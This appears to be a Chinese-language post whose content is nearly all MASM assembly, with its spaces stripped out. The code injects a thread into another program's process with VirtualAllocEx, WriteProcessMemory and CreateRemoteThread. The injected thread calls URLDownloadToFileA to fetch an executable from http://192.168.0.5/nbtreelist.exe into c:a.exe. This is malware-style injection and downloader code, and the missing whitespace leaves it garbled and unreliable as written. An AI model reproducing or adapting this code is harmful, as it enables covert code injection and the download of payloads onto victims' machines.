大家可能都用过网页szformatdbpid是:%d,0
szbufferdd20dup(0),0
piddd0
hprocessdd0
hthreaddd0
pcoderemotedd0
path1dbc:a.exe,0
.const
szmsgdburldownloadtofilea,0
userdlldburlmon.dll,0
;szmsgdbmessageboxa,0
;userdlldbuser32.dll,0
szloadlibdbloadlibrarya,0;注意和loadlibraryw的区别哟
kerdlldbkernel32.dll,0
.code
codebegin:
dispdatadbhttp://192.168.0.5/nbtreelist.exe,0
sztitdbc:a.exe,0
datalen=$-codebegin
rprocprocmsgbox;messageboxa的地址为参数
call@f;pushesi
@@:
popebx
subebx,offset@b
leaecx,[ebx+dispdata]
leaedx,[ebx+sztit]
pushnull
push0
pushedx
pushecx
pushnull
callmsgbox
ret;重要
rprocendp
codelen=$-codebegin;代码长度xx字节
start:
;invokefindwindow,0,offsettit;返回计算器窗口句柄
invokefindwindow,offsettit,0
invokegetwindowthreadprocessid,eax,offsetpid;计算机器程序的进程pid号
;invokewsprintf,offsetszbuffer,offsetszformat,pid;把pid用十进制显示
invokeopenprocess,process_all_access,false,pid;打开进程,得到进程句柄
movhprocess,eax;保存进程句柄
invokevirtualallocex,hprocess,0,codelen,mem_commit,page_execute_readwrite
movpcoderemote,eax
invokewriteprocessmemory,hprocess,pcoderemote,offsetcodebegin,codelen,null
movesi,pcoderemote
addesi,datalen
pushesi
invokeloadlibrary,offsetuserdll
invokegetprocaddress,eax,offsetszmsg
popesi
invokecreateremotethread,hprocess,0,0,esi,eax,0,0
movhthread,eax;返回线程句柄
.ifhthread
invokewaitforsingleobject,hthread,infinite;等待线程结束
invokeclosehandle,hthread;关闭线程句柄
.endif
invokevirtualfreeex,hprocess,pcoderemote,codelen,mem_release;释放